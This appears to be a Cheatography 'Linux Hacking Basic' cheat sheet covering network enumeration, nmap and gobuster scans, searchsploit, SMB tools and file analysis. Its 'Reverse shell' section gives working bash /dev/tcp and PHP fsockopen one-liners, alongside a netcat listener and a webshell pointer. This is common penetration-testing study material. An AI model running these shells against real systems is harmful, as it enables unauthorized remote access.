Cheatography

Linux Hacking Basic Cheat Sheet by

Basic networking

Show IP configuration
ip a s
DNS lookup
dig host-name.com
DNS Reverse lookup
dig -x 10.10.10.12
Look up DNS entries for a host or IP
nslookup google.com
IP for hostname
host google.com

HTTP Download

Using curl
curl http://host:8080/file.sh -o output.sh
Using wget
wget http://host:8080/file.sh

Enumeration

Portscan (first 10000 ports)
nmap -sC -sV 10.10.10.12
Portscan (all ports)
nmap -p- -sV 10.10.10.12
Portscan (UDP)
nmap -sU 10.10.10.12
Gobuster
gobuster -w wordlist.txt dir -u http://10.10.10.12
Dirb
dirb http://10.10.10.12 wordlist.txt
WordPress enumeration
Website technology enumeration
DNS Enumeration
dnsrecon -d google.com -n 10.10.10.12
DNS Zonetransfer
dnsrecon -t axfr -d zonetransfer.me
List subdomains
sublist3r -d target-host.com
Wordlists can be found at
/usr/share/wordlists/dirbuster/

Find target in network

Readout ARP cache
ip neigh
Nmap Host Discovery
nmap -sn 10.10.10.0/24
TCP scan
nmap -Pn 10.10.10.0/24

Serving own data

Python2 Webserver (current folder)
python -m SimpleHTTPServer 8080
Python3 Webserver (current folder)
python3 -m http.server 8080
Listen on port
nc -lvnp 8080

Exploit DB

Search for exploit
searchsploit apache
View exploit
searchsploit -x path/to/exploit
Copy exploit to current directory
searchsploit -m path/to/exploit

Brute forcing

Bruteforce websites (e.g. login)
hydra
Bruteforce website paths
wfuzz
Crack files
john
Check each man-page to find the detailed command parameters

Server Message Block (SMB)

SMB enumeration tool
smbmap -H 10.10.10.12
SMB network browser
smbtree
SMB Client
smbclient //10.10.10.12/

Useful commands

Change directory
cd folder
Create directory
mkdir foldername
Delete file
rm file.jpg
Delete folder
rm -r folder
Search string in file
grep pattern file.txt
Find file in a folder
find /path -name "*.xml"
Edit file (vi)
vi file.txt

Reverse shell

Bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
PHP
$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");
Other webshells can be found at
/usr/share/webshells/

File analysis

What is this file?
file unknown.x
Is there something hidden?
binwalk file.png
Extract hidden content
binwalk -e file.png

Encoding/Decoding

Text to base64
echo -n "text" | base64
base64 to text
echo -n "dGV4dA==" | base64 -d
hexeditor
xxd
